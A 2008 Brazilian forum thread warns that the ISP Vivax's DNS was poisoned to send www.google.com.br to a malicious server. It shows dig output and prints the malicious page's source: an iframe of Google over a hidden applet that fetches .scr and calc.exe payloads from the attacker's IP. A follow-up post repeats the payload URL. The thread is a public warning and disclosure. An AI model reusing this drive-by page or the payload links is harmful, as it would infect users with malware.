Urgente ! DNS da Vivax com problemas redirecionando para exploit! [RESOLVIDO]

1. Urgente ! DNS da Vivax com problemas redirecionando para exploit! [RESOLVIDO]

b30wu1f
(usa Debian)

Enviado em 08/10/2008 - 12:34h

Senhores

Gostaria de informar aos administradores que recebi um e-mail de um amigo, informando a exploração de uma vulnerabilidade conhecida do cache do Bind para redirecionar os usuários do site "www.google.com.br" para um endereço fornecendo código malicioso. Ele informou o problema ao cert, como pode ser visto no e-mail abaixo, e o problema ainda persiste e pode ser testado por vocês.

Alertem seus usuários.

"Conforme falamos, o problema persiste hoje pela manhã, com os servidores ainda no ar e resolvendo para o servidor da vivax, conforme segue:

~$ date
Qua Out 8 11:08:51 BRT 2008
~$ dig @201.6.0.139 www.google.com.br

; <<>> DiG 9.4.2-P1 <<>> @201.6.0.139 www.google.com.br
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48136
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;www.google.com.br. IN A

;; ANSWER SECTION:
www.google.com.br. 5 IN A 201.75.18.168

;; Query time: 139 msec
;; SERVER: 201.6.0.139#53(201.6.0.139)
;; WHEN: Wed Oct 8 11:08:54 2008
;; MSG SIZE rcvd: 51

O código fonte do site malicioso é o seguinte:
<html>
<title>Google</title>
<body margin: 0>
<iframe frameborder='0' width='100%' height='100%' src='http://64.233.169.147' margin-left:0>
</iframe>

<div style="position: absolute; left: 0px; right: 0px; background;red ; visibility: hidden;">
<applet onerror="if(redir){redir=false;document.location='http://201.75.18.168/google/view.scr';}" name="google plugin searcher" code="Inicio.class" archive="http://www.google.com/searcher.jar" height='0' width='0'>
<param name='url' value="http://201.75.18.168/google/calc.exe">
</applet>

</div>
</html>

Note que ele abre a página oficial do google dentro de um iframe e chama o applet com o código malicioso no browser do usuário.

Os principais contatos de ABUSE (inclusive o Virtua) e o CERT foram notificados ontem a noite, por volta das 22h30.

Acho importante que os usuários sejam notificados o quanto antes.

Qualquer dúvida estou à disposição.

Abs.,

Wagner Hiendlmayer "

Jader Simões

0 0

Quote

2. Resolvido após 14 horas

b30wu1f
(usa Debian)

Enviado em 08/10/2008 - 12:47h

O problema acabou de ser resolvido. 14 horas desde o anúncio até a resolução, mas o IP que está distribuindo o exploit ainda está ativo! http://201.75.18.168/google/view.scr

Divirtam-se

0 0

Quote